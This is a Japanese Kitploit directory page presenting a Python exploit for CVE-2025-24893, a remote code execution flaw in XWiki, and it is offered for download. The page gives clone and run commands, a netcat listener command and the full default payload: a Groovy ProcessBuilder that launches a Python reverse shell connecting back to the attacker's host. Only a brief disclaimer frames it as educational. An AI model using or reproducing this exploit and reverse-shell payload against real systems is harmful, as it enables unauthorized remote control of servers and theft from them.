Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-24893 — CVE-2025-24893 用の改変エクスプロイト | Kitploit
ツール/GitHubGitHub/hackersonsteroids/cve-2025-24893
エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツールペイロード開発
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

CVE-2025-24893 用の改変エクスプロイト

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893 XWiki RCE エクスプロイト

Exploit Banner

CVE-2025-24893(XWiki Platform のリモートコード実行の脆弱性)を、Groovyベースの async マクロと設定可能なリバースシェルペイロードを用いて悪用する、シンプルな Python3 スクリプトです。

⚠️ 警告: このツールは教育目的および許可されたテスト目的のみで提供されます。所有していない、または明示的なテスト許可を得ていないシステムに対する不正な使用は、違法かつ非倫理的です。


目次

  • 機能
  • 必要条件
  • インストール
  • 使用方法
  • 検出とプロトコルフォールバック
  • リバースシェルペイロード
  • ライセンス
  • 免責事項

機能

  • ✅ ターゲットがHTTPSとHTTPのどちらに対応しているかを自動検出します
  • ✅ Runtime.exec の癖を避けるため、Groovy の ProcessBuilder スニペットを構築します
  • ✅ XWiki の async+groovy マクロのペイロードを URL エンコードします
  • ✅ 設定可能なリバースシェル(ホスト+ポート)
  • ✅ HTTP レスポンスコードを表示して、配信の確認に役立てます

必要条件

  • Python 3.6 以上
  • requests ライブラリ
root@kitploit:~
pip install requests

インストール

このリポジトリをクローンします:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

使用方法

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> XWiki ホスト(例: wiki.example.local)。

  • <LHOST> 攻撃者マシンの IP(リスナーが実行されている場所)。

  • <LPORT> リスナーのポート(整数)。


実行例

  1. 自分のマシンでリスナーを起動します:
root@kitploit:~
nc -lvnp 4444
  1. エクスプロイトを実行します:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. 成功すると、netcat リスナーでシェルを確認します。

検出とプロトコルフォールバック

ペイロードを送信する前に、スクリプトは次の処理を行います:

  1. https://<TARGET_DOMAIN> を試行
  2. HTTPS が失敗した場合は http://<TARGET_DOMAIN> にフォールバック
  3. どちらも到達不能な場合は終了

これにより、プロトコル混在のデプロイ環境との互換性が保証されます。


リバースシェルペイロード

デフォルトでは、スクリプトは Python3 のワンライナーを使用します:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • 異なるシェル(例: Bash、Perl、PHP など)が必要な場合は、build_payload() 関数を変更できます。

ライセンス

このプロジェクトはMIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。


免責事項

このツールは許可されたセキュリティ評価および教育目的のみを対象として設計されています。著者は誤用に対していかなる責任も負いません。テスト対象のシステムをテストする前に、必ず明示的な許可を取得してください。

ツールをダウンロード